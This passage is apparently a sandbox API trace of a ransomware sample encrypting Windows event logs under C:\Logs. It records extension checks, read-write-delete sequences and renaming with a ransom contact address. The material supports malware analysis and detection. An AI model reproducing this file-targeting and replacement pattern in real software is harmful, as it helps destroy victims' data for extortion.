[0068.287] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.287] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0068.287] lstrlenW (lpString=".zip") returned 4 [0068.287] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.287] lstrlenW (lpString=".rar") returned 4 [0068.287] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.287] lstrlenW (lpString=".bz2") returned 4 [0068.287] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.287] lstrlenW (lpString=".7z") returned 3 [0068.287] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.287] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0068.287] lstrlenW (lpString=".dbf") returned 4 [0068.287] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.287] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0068.287] lstrlenW (lpString=".1cd") returned 4 [0068.288] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.288] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0068.288] lstrlenW (lpString=".jpg") returned 4 [0068.288] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.288] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0068.288] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0068.288] lstrlenW (lpString=".doc") returned 4 [0068.288] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.288] lstrlenW (lpString=".docx") returned 5 [0068.288] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.288] lstrlenW (lpString=".pdf") returned 4 [0068.288] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.288] lstrlenW (lpString=".xls") returned 4 [0068.288] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.288] lstrlenW (lpString=".xlsx") returned 5 [0068.288] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.288] lstrlenW (lpString=".ppt") returned 4 [0068.288] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.288] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0068.288] lstrlenW (lpString=".zip") returned 4 [0068.288] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.288] lstrlenW (lpString=".rar") returned 4 [0068.288] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.288] lstrlenW (lpString=".bz2") returned 4 [0068.288] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.288] lstrlenW (lpString=".7z") returned 3 [0068.288] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.288] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0068.288] lstrlenW (lpString=".dbf") returned 4 [0068.288] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.288] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0068.288] lstrlenW (lpString=".1cd") returned 4 [0068.289] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.289] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 54 [0068.289] lstrlenW (lpString=".jpg") returned 4 [0068.289] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.289] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.289] lstrlenW (lpString="Microsoft-Windows-SMBClient%4Operational.evtx") returned 45 [0068.289] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0068.289] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0068.289] CloseHandle (hObject=0x368) returned 1 [0068.289] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx")) returned 0x20 [0068.289] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.289] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0068.289] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.290] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.290] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0068.290] GetLastError () returned 0x0 [0068.290] ReadFile (in: hFile=0x368, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.300] WriteFile (in: hFile=0x344, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.301] ReadFile (in: hFile=0x368, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.301] WriteFile (in: hFile=0x344, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x12e, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x12e, lpOverlapped=0x0) returned 1 [0068.302] SetEndOfFile (hFile=0x344) returned 1 [0068.302] CloseHandle (hObject=0x344) returned 1 [0068.302] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.302] SetEndOfFile (hFile=0x368) returned 1 [0068.303] CloseHandle (hObject=0x368) returned 1 [0068.303] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.303] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx")) returned 1 [0068.303] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0068.303] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0068.303] lstrlenW (lpString=".doc") returned 4 [0068.303] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.303] lstrlenW (lpString=".docx") returned 5 [0068.303] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.303] lstrlenW (lpString=".pdf") returned 4 [0068.304] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.304] lstrlenW (lpString=".xls") returned 4 [0068.304] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.304] lstrlenW (lpString=".xlsx") returned 5 [0068.304] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.304] lstrlenW (lpString=".ppt") returned 4 [0068.304] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.304] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0068.304] lstrlenW (lpString=".zip") returned 4 [0068.304] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.304] lstrlenW (lpString=".rar") returned 4 [0068.304] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.304] lstrlenW (lpString=".bz2") returned 4 [0068.304] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.304] lstrlenW (lpString=".7z") returned 3 [0068.304] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.304] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0068.304] lstrlenW (lpString=".dbf") returned 4 [0068.304] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.304] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0068.304] lstrlenW (lpString=".1cd") returned 4 [0068.304] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.304] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0068.304] lstrlenW (lpString=".jpg") returned 4 [0068.304] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.304] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0068.304] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0068.304] lstrlenW (lpString=".doc") returned 4 [0068.304] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.304] lstrlenW (lpString=".docx") returned 5 [0068.304] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.305] lstrlenW (lpString=".pdf") returned 4 [0068.305] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.305] lstrlenW (lpString=".xls") returned 4 [0068.305] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.305] lstrlenW (lpString=".xlsx") returned 5 [0068.305] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.305] lstrlenW (lpString=".ppt") returned 4 [0068.305] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.305] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0068.305] lstrlenW (lpString=".zip") returned 4 [0068.305] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.305] lstrlenW (lpString=".rar") returned 4 [0068.305] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.305] lstrlenW (lpString=".bz2") returned 4 [0068.305] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.305] lstrlenW (lpString=".7z") returned 3 [0068.305] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.305] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0068.305] lstrlenW (lpString=".dbf") returned 4 [0068.305] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.305] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0068.305] lstrlenW (lpString=".1cd") returned 4 [0068.305] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.305] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 53 [0068.306] lstrlenW (lpString=".jpg") returned 4 [0068.306] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.306] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.306] lstrlenW (lpString="Microsoft-Windows-SmbClient%4Security.evtx") returned 42 [0068.306] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0068.319] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0068.319] CloseHandle (hObject=0x368) returned 1 [0068.319] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx")) returned 0x20 [0068.319] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.875] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0068.875] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.875] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.875] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0068.876] GetLastError () returned 0x0 [0068.876] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.879] WriteFile (in: hFile=0x350, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.881] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.881] WriteFile (in: hFile=0x350, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x128, lpOverlapped=0x0) returned 1 [0068.881] SetEndOfFile (hFile=0x350) returned 1 [0068.882] CloseHandle (hObject=0x350) returned 1 [0068.882] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.882] SetEndOfFile (hFile=0x344) returned 1 [0068.883] CloseHandle (hObject=0x344) returned 1 [0068.883] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.884] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx")) returned 1 [0068.884] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0068.884] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0068.884] lstrlenW (lpString=".doc") returned 4 [0068.884] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.884] lstrlenW (lpString=".docx") returned 5 [0068.884] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.884] lstrlenW (lpString=".pdf") returned 4 [0068.884] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.884] lstrlenW (lpString=".xls") returned 4 [0068.884] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.884] lstrlenW (lpString=".xlsx") returned 5 [0068.884] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.884] lstrlenW (lpString=".ppt") returned 4 [0068.884] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.884] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0068.884] lstrlenW (lpString=".zip") returned 4 [0068.884] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.884] lstrlenW (lpString=".rar") returned 4 [0068.884] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.885] lstrlenW (lpString=".bz2") returned 4 [0068.885] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.885] lstrlenW (lpString=".7z") returned 3 [0068.885] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.885] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0068.885] lstrlenW (lpString=".dbf") returned 4 [0068.885] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.885] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0068.885] lstrlenW (lpString=".1cd") returned 4 [0068.885] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.885] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0068.885] lstrlenW (lpString=".jpg") returned 4 [0068.885] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.885] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0068.885] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0068.885] lstrlenW (lpString=".doc") returned 4 [0068.885] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.885] lstrlenW (lpString=".docx") returned 5 [0068.885] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.885] lstrlenW (lpString=".pdf") returned 4 [0068.885] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.885] lstrlenW (lpString=".xls") returned 4 [0068.885] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.885] lstrlenW (lpString=".xlsx") returned 5 [0068.885] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.885] lstrlenW (lpString=".ppt") returned 4 [0068.885] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.885] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0068.886] lstrlenW (lpString=".zip") returned 4 [0068.886] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.886] lstrlenW (lpString=".rar") returned 4 [0068.886] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.886] lstrlenW (lpString=".bz2") returned 4 [0068.886] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.886] lstrlenW (lpString=".7z") returned 3 [0068.886] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.886] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0068.886] lstrlenW (lpString=".dbf") returned 4 [0068.886] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.886] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0068.886] lstrlenW (lpString=".1cd") returned 4 [0068.886] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.886] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0068.886] lstrlenW (lpString=".jpg") returned 4 [0068.886] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.886] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.886] lstrlenW (lpString="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 72 [0068.886] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0068.888] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=1052672) returned 1 [0068.888] CloseHandle (hObject=0x344) returned 1 [0068.888] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx")) returned 0x20 [0068.888] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.888] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0068.888] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.889] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.889] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0068.889] GetLastError () returned 0x0 [0068.889] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0069.545] WriteFile (in: hFile=0x350, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0069.559] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x1010, lpOverlapped=0x0) returned 1 [0069.566] WriteFile (in: hFile=0x350, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x1020, lpOverlapped=0x0) returned 1 [0069.569] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.569] WriteFile (in: hFile=0x350, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x164, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x164, lpOverlapped=0x0) returned 1 [0069.570] SetEndOfFile (hFile=0x350) returned 1 [0069.570] CloseHandle (hObject=0x350) returned 1 [0069.570] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.570] SetEndOfFile (hFile=0x344) returned 1 [0069.571] CloseHandle (hObject=0x344) returned 1 [0069.571] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0069.571] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx")) returned 1 [0069.571] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0069.571] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0069.571] lstrlenW (lpString=".doc") returned 4 [0069.571] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0069.571] lstrlenW (lpString=".docx") returned 5 [0069.571] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0069.571] lstrlenW (lpString=".pdf") returned 4 [0069.571] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0069.571] lstrlenW (lpString=".xls") returned 4 [0069.571] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0069.571] lstrlenW (lpString=".xlsx") returned 5 [0069.571] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0069.571] lstrlenW (lpString=".ppt") returned 4 [0069.572] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0069.572] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0069.572] lstrlenW (lpString=".zip") returned 4 [0069.572] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0069.572] lstrlenW (lpString=".rar") returned 4 [0069.572] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0069.572] lstrlenW (lpString=".bz2") returned 4 [0069.572] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0069.572] lstrlenW (lpString=".7z") returned 3 [0069.572] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0069.572] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0069.572] lstrlenW (lpString=".dbf") returned 4 [0069.572] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0069.572] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0069.572] lstrlenW (lpString=".1cd") returned 4 [0069.572] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0069.572] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 